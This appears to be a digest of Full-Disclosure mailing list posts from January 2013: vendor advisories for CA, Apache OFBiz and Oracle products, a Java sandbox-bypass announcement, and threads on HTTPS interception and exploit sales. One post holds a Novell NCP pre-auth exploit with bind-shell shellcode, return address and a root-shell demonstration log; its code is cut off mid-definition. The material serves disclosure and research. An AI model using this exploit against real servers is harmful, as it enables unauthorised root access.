Re: [Full-disclosure] How to prevent HTTPS MitM
On 17-Jan-2013 21:56:53 +0100, Luigi Rosa wrote: > I was reading about Nokia HTTPS MitM. Many corporate firewall > can MitM HTTPS for content inspection and many governments do > this for their reasons. > I was thinking: could it be possible to create a fake HTTPS > stream to DoS the MitM attempt? Yes, but that most likely will cut your Internet connection on the inspection proxy. -- Alexey V. Vissarionov aka Gremlin from Kremlin GPG key ID: 0xEF3B1FA8, keyserver: hkp://subkeys.pgp.net GPG key fingerprint: 8832 FE9F A791 F796 8AC9 6E4E 909D AC45 EF3B 1FA8 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CA20121220-01: Security Notice for CA IdentityMinder [updated]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 CA20121220-01: Security Notice for CA IdentityMinder Issued: December 20, 2012 Updated: January 18, 2013 CA Technologies Support is alerting customers to two potential risks in CA IdentityMinder (formerly known as CA Identity Manager). Two vulnerabilities exist that can allow a remote attacker to execute arbitrary commands, manipulate data, or gain elevated access. CA Technologies has issued patches to address the vulnerabilities. The first vulnerability, CVE-2012-6298, allows a remote attacker to execute arbitrary commands or manipulate data. The second vulnerability, CVE-2012-6299, allows a remote attacker to gain elevated access. Risk Rating High Affected Platforms All Affected Products CA IdentityMinder r12.0 CR16 and earlier CA IdentityMinder r12.5 SP1 thru SP14 CA IdentityMinder r12.6 GA Non-Affected Products None (i.e. all supported versions of CA IdentityMinder are vulnerable) How to determine if the installation is affected All versions of CA IdentityMinder r12.0, r12.5 prior to SP15, and r12.6 GA are vulnerable. You can confirm that patches have been successfully applied by checking the dates associated with the following IdentityMinder jar files (the jar files are created in the patch output sub-folder structure in the root folder from which you have run the patch utility): CA IdentityMinder r12.0 CR16 and earlier – user_console.jar CA IdentityMinder r12.5 SP1 thru SP6 – user_console.jar CA IdentityMinder r12.5 SP7 thru SP14 – user_console.jar & imsapi6.jar CA IdentityMinder r12.6 GA – user_console.jar & imsapi6.jar The dates on these jar files will be set to the date on which the patch was applied. Solution CA Technologies has issued the following patches to address the vulnerabilities. Download the appropriate patch(es) and follow the instructions in the readme.txt file. These patches can be applied to all operating system platforms. 12.0CR8+ - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/120CR8+.zip 12.5SP1 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP1.zip 12.5SP2 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP2.zip 12.5SP3 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP3.zip 12.5SP4 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP4.zip 12.5SP5 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP5.zip 12.5SP6 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP6.zip 12.5SP7 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP7.zip 12.5SP8 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP8.zip 12.5SP9 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP9.zip 12.5SP10 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP10.zip 12.5SP11 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP11.zip 12.5SP12 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP12.zip 12.5SP13 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP13.zip 12.5SP14 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/125SP14.zip 12.6SP0 - ftp://ftp.ca.com/caproducts/IdentityMgr/IDMGR/SecVul/126GA.zip Workaround None References CVE-2012-6298 - CA IdentityMinder execute arbitrary commands or manipulate data CVE-2012-6299 - CA IdentityMinder gain elevated access CA20121220-01: Security Notice for CA IdentityMinder (URL may wrap) https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={FBA53B 61-3A68-4506-9876-F845F6DD8A93} Acknowledgement CVE-2012-6298 - Discovered internally by CA Technologies CVE-2012-6299 - Discovered internally by CA Technologies Change History Version 1.0: Initial Release Version 1.1: Revised the section entitled "How to determine if the installation is affected". If additional information is required, please contact CA Technologies Support at https://support.ca.com/ If you discover a vulnerability in CA Technologies products, please report your findings to the CA Technologies Product Vulnerability Response Team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782 CA Technologies Security Notices https://support.ca.com/irj/portal/anonymous/phpsbpldgpg Thanks and regards, Ken Williams, Director CA Technologies Product Vulnerability Response Team CA Technologies Business Unit Operations wilj...@ca.com Copyright (C) 2013 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. 11749. All other trademarks, trade names, service marks, and logos referenced herein belong to their respective companies. -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.9.1 (Build 287) Charset: utf-8 wj8DBQFQ+dCzeSWR3+KUGYURAnGbAJ9yscNDhny2rCY2X4qS6g/YtOtM6QCffyTw tZL1z2lAQhkrxdDNzN9tyzs= =rNug -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [CVE-2013-0177] Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
CVE-2013-0177: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache OFBiz 11.04.01 Apache OFBiz 10.04.04 and earlier releases in the series (10.04.*) The unsupported Apache OFBiz 09.04.* versions may be also affected Description: Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and Image.alt Widget attributes because the content of these two elements was not properly escaped. Mitigation: 10.04.* users should upgrade to 10.04.05 11.04.01 users should upgrade to 11.04.02 Credit: This issue was discovered by Marcos Garcia (@artsweb)/ Juan Caillava (@jcaillava) References: http://ofbiz.apache.org/download.html#vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] how to sell and get a fair price
On Wed, 16 Jan 2013 10:18:36 +0400, grem...@gremlin.ru said: > On 15-Jan-2013 16:45:30 -0500, valdis.kletni...@vt.edu wrote: > > > Also, what stops a person to file it under a company name if > > > that's easier? I admit I'm not into this area, so I might be > > > missing something fundamental... > > If you publish an exploit as "BitWizard97", and somebody scarfs > > it up and starts selling it, > Starts selling what? Already published exploit? Bwahahaha... You'd be amazed how many people try that sort of thing. Consider that over on the GPL side of the fence, there's more than enough companies that try to play fast-n-loose with the GPL requirements that www.gpl-violations.org stays in business. (Also, keep in mind that there *are* a large number of exploits that are in limited circulation. Hacker X releases it to 10 or 15 of his friends, and then one of his friends turns around and cashes it in at some corporate, and then said corporate starts selling it as part of their cyber-defense product. At that point, Hacker X wants to get paid (money, fame, credit, whatever)). > > filing the suit to enjoin them from selling it without your > > permission under a company name doesn't make it any easier > > to prove that you, or the company, have any legal standing > > to represent BitWizard97. > Digital signatures may help. Actually, you don't need to prove > that you are the BitWizard97 - you only need to prove that you > can act on his behalf (that means: read encrypted messages and > sign the replies with his key). I believe I mentioned PGP way back at the start of the thread. Also helps if you actually PGP-signed your release. Bonus points for figuring out how to explain digital signatures to a jury, stripping it down to "up-goer-five" level needed for the people who can't figure out how to avoid serving on a jury (see http://www.xkcd.com/1133/ for the details on that). > > It's especially problematic if the local law enforcement > > authorities want to have a little chat with BitWizard97 > > regarding some other activities... > They should want to ask those questions to another person - > say, BitBreaker12, who may be suspected in something illegal. And why should they ask that other person instead? You think if the LEO is interested in a particular person's activities, that person gets a free pass just because they're involved in an unrelated court case? That the cops are just going to say "Wow, he's busy in court today, let's go hassle somebody who's name hasn't even come up in this context"? pgpimfY5y5UNe.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] White Paper: Detecting System Intrusions
On Fri, Jan 18, 2013 at 3:21 PM, wrote: > On Wed, 16 Jan 2013 12:39:18 -0500, Almaz said: > >> How to detect system intrusions? What are the techniques? Can one character >> difference in the output be an indicator of compromise? > > Paging Cliff Stoll.. Cliff Stoll to the courtesy phone... Damn You can only get "The KGB, the Computer, and Me" on VHS! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] White Paper: Detecting System Intrusions
On Wed, 16 Jan 2013 12:39:18 -0500, Almaz said: > How to detect system intrusions? What are the techniques? Can one character > difference in the output be an indicator of compromise? Paging Cliff Stoll.. Cliff Stoll to the courtesy phone... pgpbzm07bhB35.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
On Mon, Jan 14, 2013 at 10:34 AM, wrote: > https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck > > Above link to remove this prosecutor needs to have signatures by > February 11. Congratulations. It looks like you exceeded the threshold required by a factor of nearly two. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SE-2012-01] Java 7 Update 11 confirmed to be vulnerable
Hello All, This post might be interesting for those concerned about the state of Oracle's Java SE security. We have successfully confirmed that a complete Java security sandbox bypass can be still gained under the recent version of Java 7 Update 11 [1] (JRE version 1.7.0_11-b21). MBeanInstantiator bug (or rather a lack of a fix for it [2][3]) turned out to be quite inspirational for us. However, instead of relying on this particular bug, we have decided to dig our own issues. As a result, two new security vulnerabilities (51 and 52) were spotted in a recent version of Java SE 7 code and they were reported to Oracle today [4] (along with a working Proof of Concept code). Thank you. Best Regards Adam Gowdiak - Security Explorations http://www.security-explorations.com "We bring security research to the new level" - References: References: [1] Oracle Security Alert for CVE-2013-0422 http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html [2] Java 7 Update 11 Addresses the Flaw Partly Fixed in October 2012, Experts Say http://news.softpedia.com/news/Java-7-Update-11-Addresses-the-Flaw-Partly-Fixed-in-October-2012-Experts-Say-320792.shtml [3] Confirmed: Java only fixed one of the two bugs http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html [4] SE-2012-01 Vendors status http://www.security-explorations.com/en/SE-2012-01-status.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow. (CVE-2012-0432) Exploit
In the interest of full-disclosure, here is a remote exploit for the vulnerability found by David Klein: Demonstration Novell NCP Pre-Auth Remote Stack Buffer Overflow Connecting to host [127.0.0.1]... Connected! Sending message #1 (23 bytes) <-- 44 6d 64 54 00 00 00 17 00 00 00 01 00 00 00 00 11 11 00 00 00 00 00 Waiting for response (16 bytes)... Received 16 bytes (expecting 16) --> 74 4e 63 50 00 00 00 10 33 33 00 0a 00 00 00 00 Response #1 is valid, continue exploitation Received response connection number 0a Sending payload (190 bytes)... [...omitted...] 190 bytes sent Attempting to connect to shell at port 5074... Sleeping for 10 seconds... Success! pwd /var/opt/novell/instance0/data/dib id uid=0(root) gid=0(root) groups=0(root) exit Connection closed ** BEGIN EXPLOIT ** /* * Novell NCP Pre-Auth Remote Root Exploit * Written by Gary Nilson 11-17-2013 * * Overview (US-CERT/NIST CVES:CVE-2012-0432): * Stack-based buffer overflow in the Novell NCP implementation in * NetIQ eDirectory 8.8.7.x before 8.8.7.2 allows remote attackers to have an * unspecified impact via unknown vectors. * * Fix: Issues resolved in eDirectory 8.8 SP7 Patch 2 (20703.00) * * Exploited Platform: * Novell eDirectory 8.8 SP7 v20701.48 * Distribution: Debian GNU/Linux 6.0.6 (squeeze) * Linux Kernel: 2.6.32-5-686 * * Discovery: David Klein (david.r.klein at 676D61696) * */ #include #include #include #include #include #include #include #include #include /* * Due to address space randomization on my platform I had to rely on the * following in order to reliably execute the payload: * - At the moment that %eip is overwritten, %esi happens to point to the payload * located on the heap (horray). * - Address spaced mapped from 0x08087000-0x080a6000 (Data segment) contains * the handy instruction jmp *%esi (located at 0x080a4697). */ #define NCP_PORT 524 #define SHELL_BIND_PORT 5074 #define RET_ADDRESS 0x080a4697 #define RET_PAYLOAD_OFFSET 65 #define PORT_PAYLOAD_OFFSET 24 #define PAYLOAD_SIZE 190 #define SHELL_CONNECT_DELAY 10 int main(int argc, char **argv){ struct hostent *host; struct sockaddr_in target_addr; int sockfd; fd_set rdfdset, fdsave;; int len_in; int i; int payload_size; int ret_address; short shell_port; int msg1_buffsize; int msg2_headersize; int recv_buffsize; int shellcode_size; char iochar; char *msg2_buff; char *recv_buff; /* Shellcode (adapted): * s0t4i...@shellcode.com.ar * x86 portbind a shell in port 5074 */ char port_bind[] = "\xeb\x04" /* jmp +4 bytes*/ "\x00\x00\x00\x00" /* eip */ "\x31\xc0\x50\x40\x89\xc3\x50\x40" /* begin shellcode */ "\x50\x89\xe1\xb0\x66\xcd\x80\x31" "\xd2\x52\x66\x68\x13\xd2\x43\x66" "\x53\x89\xe1\x6a\x10\x51\x50\x89" "\xe1\xb0\x66\xcd\x80\x40\x89\x44" "\x24\x04\x43\x43\xb0\x66\xcd\x80" "\x83\xc4\x0c\x52\x52\x43\xb0\x66" "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd" "\x80\x41\x80\xf9\x03\x75\xf6\x52" "\x68\x6e\x2f\x73\x68\x68\x2f\x2f" "\x62\x69\x89\xe3\x52\x53\x89\xe1" "\xb0\x0b\xcd\x80"; char msg1[] = "\x44\x6d\x64\x54" /* NCP TCP id */ "\x00\x00\x00\x17" "\x00\x00\x00\x01\x00\x00\x00\x00" "\x11\x11\x00\x00\x00\x00\x00"; char recv[] = "\x74\x4e\x63\x50" /* TCP RCVD id */ "\x00\x00\x00\x10" /* length ? */ "\x33\x33" /* service connection reply */ "\x00" /* sequence number */ "\x10" /* connection number*/ "\x00" /* task number */ "\x00" /* reserved */ "\x00" /* completion code */ "\x00";/* ?? */ /* special thanks to the ncpfs source */ char msg2_header[] = "\x44\x6d\x64\x54" /* NCP TCP id */ "\x00\x00\x01\xa0" /* request_size + 16 + siglen + 6 */ "\x00\x00\x00\x01" /* version (1)*/ "\x00\x00\x00\x05" /* (reply buffer size)*/ /* signature would go here*/ "\x22\x22" /* cmd*/ "\x01" /* conn->sequence */ "\x0f" /* conn->i.connection ??? */ "\x00" /* task (1) */ "\x00"
Re: [Full-disclosure] Are software cracks also a form of security vulnerabilities?
On 2013-01-17 10:20, COPiOUS wrote: > Hello, > > First of all, the question is in the subject. Should say enough. > > In my opinion they are, since a software crack allows unauthorized > use of software and the exposure of (possible) trade secrets, but I > want to know how other people think about this. Also, by cracking > software packages, other issues pop up quite often - quite a lot of > applications aren't tamper-proof. But does "not tamper-proof" mean > that the software is flawed? the software is not flawed, the concept is. technically, software protections, that lead to software cracks, are just another form of the flawed by design concept of DRM... free software doesn't use stikin' DRM to prevent copying, thus is impervious to the existence of software cracks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to prevent HTTPS MitM
On Thu, Jan 17, 2013 at 09:56:53PM +0100, Luigi Rosa wrote: > If this message is offtopic, please excuse me. > > I was reading about Nokia HTTPS MitM. Many corporate firewall can MitM HTTPS > for content inspection and many governments do this for their reasons. > > I was thinking: could it be possible to create a fake HTTPS stream to DoS the > MitM attempt? You could probably just capture the first packet of the SSL stream that your browser sends for a valid request and then replay it... that's probably the easiest way. signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Oracle Outside In Technology Paradox Database Handling Buffer Overflow
== Secunia Research 16/01/2013 - Oracle Outside In Technology Stream Filters - - Paradox Database Handling Buffer Overflow - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Oracle Outside In SDK version 8.3.7 (w/ patch 14153713). NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Vendor's Description of Software "Outside In Technology is a suite of software development kits (SDKs) that provides developers with a comprehensive solution to extract, normalize, scrub, convert and view the contents of 600 unstructured file formats." Product Link: http://www.oracle.com/technetwork/middleware/webcenter/content /oit-all-085236.html == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In Technology, which can be exploited by malicious people to compromise a vulnerable system.. The vulnerability is caused due to an error in the Paradox database stream filter (vspdx.dll) when processing the field names and can be exploited to cause a heap-based buffer overflow via a specially crafted "number of fields" value in the table header. == 5) Solution Apply patch. == 6) Time Table 11/10/2012 - Vendor notified. 15/10/2012 - Vendor response. 17/12/2012 - Vendor response, fix scheduled for next CPU. 16/01/2013 - Public disclosure. == 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2013-0418 identifier for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2013-02/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Secunia Research: Oracle Outside In Technology Paradox Database Handling Denial of Service
== Secunia Research 16/01/2013 - Oracle Outside In Technology Stream Filters - - Paradox Database Handling Denial of Service - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Oracle Outside In SDK version 8.3.7 (w/ patch 14153713). NOTE: Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of service Where: From remote == 3) Vendor's Description of Software "Outside In Technology is a suite of software development kits (SDKs) that provides developers with a comprehensive solution to extract, normalize, scrub, convert and view the contents of 600 unstructured file formats." Product Link: http://www.oracle.com/technetwork/middleware/webcenter/content /oit-all-085236.html == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Oracle Outside In Technology, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the Paradox database stream filter (vspdx.dll) when processing the field type within a field description array and can be exploited to reference unallocated memory via an unsupported type value (e.g. 14). == 5) Solution Apply patch. == 6) Time Table 11/10/2012 - Vendor notified. 15/10/2012 - Vendor response. 17/12/2012 - Vendor response, fix scheduled for next CPU. 16/01/2013 - Public disclosure. == 7) Credits Discovered by Dmitriy Pletnev, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2013-0393 identifier for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2013-01/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/